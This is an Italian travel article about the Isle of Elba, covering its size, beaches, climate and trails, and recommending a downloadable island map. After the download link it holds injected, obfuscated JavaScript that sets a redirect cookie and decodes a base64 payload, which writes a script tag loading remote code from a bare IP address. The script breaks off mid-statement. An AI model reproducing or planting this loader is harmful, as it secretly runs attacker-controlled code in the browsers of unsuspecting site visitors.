Elba: un’isola tutta da scoprire… cartina alla mano!
Basta dare uno sguardo alla mappa dell’Isola d’Elba per rendersi conto di quanto sia vasta ed articolata: ben duecentoventiquattro chilometri quadrati di superficie e centoquarantaquattro di coste la mettono infatti al terzo posto tra le isole italiane dopo Sicilia e Sardegna. Distante appena dieci chilometri dalla costa italiana, rappresenta la più grande attrattiva dell’arcipelago toscano, spaziando dalle alte vette montuose del Monte Capanne alle coste frastagliate passando per le pianure di S. Giovanni, di Mola e di Campo.
Le numerose spiagge tra baie, insenature ed ampie distese possono essere ghiaiose, sabbiose o rocciose a seconda della natura geologica di ogni zona (calcaree, granitiche o ferrose) caratterizzando il paesaggio costiero e le sfumature dell’acqua in modo diverso da un punto all’altro. Dal clima particolarmente mite, Elba è meta turistica praticamente tutto l’anno con una maggiore affluenza concentrata nei mesi di Luglio ed Agosto, ma godibilissima sin da Aprile fino ad Ottobre.
Qualunque sia la località scelta per la vostra vacanza, è utile procurarsi una cartina dell’Isola d’Elba prima di partire per studiarne il territorio e preparare una selezione delle cose da vedere. Scegliere le spiagge più belle e verificare come arrivarvi: molte di esse, infatti, sono raggiungibili comodamente con l’automobile attraverso normali strade asfaltate, per altre può essere più indicato arrivarci a piedi oppure in bici, ma le calette più interessanti sono ovviamente quelle raggiungibili via mare, per le quali è necessario procurarsi un’imbarcazione.
Per chi ama l’arte e la cultura, avventurarsi sull’Isola d’Elba cartina alla mano può essere una meravigliosa occasione per unire la bellezza di una vacanza sul mare con la possibilità di visitare un grande numero di borghi storici ottimamente conservati. Analogamente gli amanti della natura e del trekking potranno studiare in anticipo i percorsi nel verde del Parco Nazionale dell’Arcipelago Toscano o seguire le tracce delle escursioni sulle antiche vie minerarie.
La mappa potete scaricarla qui: http://www.elba1961.it/download/cartinaelba.zip _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘